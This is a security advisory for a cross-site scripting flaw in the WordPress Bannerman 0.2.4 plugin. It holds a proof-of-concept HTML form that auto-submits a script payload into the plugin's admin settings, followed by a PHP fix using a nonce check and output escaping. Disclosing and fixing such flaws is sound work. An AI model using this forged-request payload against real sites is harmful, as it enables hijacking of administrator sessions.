WordPress Bannerman plugin version 0.2.4 suffers from a cross-site scripting vulnerability.
bf0c15829a7d36b2a5e96affd7487c23503c5a385af93312ea99b95382b97ddd
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
# Date : 2014-06-27
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
######################
Exploit Code:
<html>
<body>
<form name="post_form"
action="http://localhost/wp-admin/options-general.php?page=bannerman"
method="post">
<input type='hidden' name="bannerman_background"
id="bannerman_background" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>
#####################
Discovered By : ACC3SS
#####################
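
A defensive counterpart to the proof of concept above, added here as an example and not taken from the Bannerman source: a settings handler that verifies a nonce before saving and escapes the value on output. The page slug, nonce action and function name are hypothetical, and treating `bannerman_background` as a hex colour is an assumption.

```php
<?php
// Added example: hypothetical settings page, not Bannerman's code.
// Only the field name bannerman_background comes from the advisory.
defined( 'ABSPATH' ) || exit; // load only inside WordPress

add_action( 'admin_menu', function () {
    add_options_page( 'Example Banner', 'Example Banner', 'manage_options',
        'example-banner', 'example_banner_settings_page' );
} );

function example_banner_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        // A form auto-submitted from another site cannot carry a valid
        // nonce, so the request stops here before anything is stored.
        check_admin_referer( 'example_banner_save' );

        $raw = isset( $_POST['bannerman_background'] )
            ? wp_unslash( $_POST['bannerman_background'] ) : '';
        // Assumption: the field holds a hex colour. sanitize_hex_color()
        // returns null for any other non-empty string, markup included.
        $color = is_string( $raw ) ? sanitize_hex_color( $raw ) : null;
        if ( null !== $color ) {
            update_option( 'bannerman_background', $color );
        }
    }

    $value = get_option( 'bannerman_background', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'example_banner_save' ); ?>
        <!-- esc_attr() encodes quotes and angle brackets, so a stored value
             cannot close the attribute or open a script element. -->
        <input type="text" name="bannerman_background"
               value="<?php echo esc_attr( $value ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Output escaping is the control that matters even if validation is loosened later: any value already stored in the option is rendered inert by `esc_attr()`.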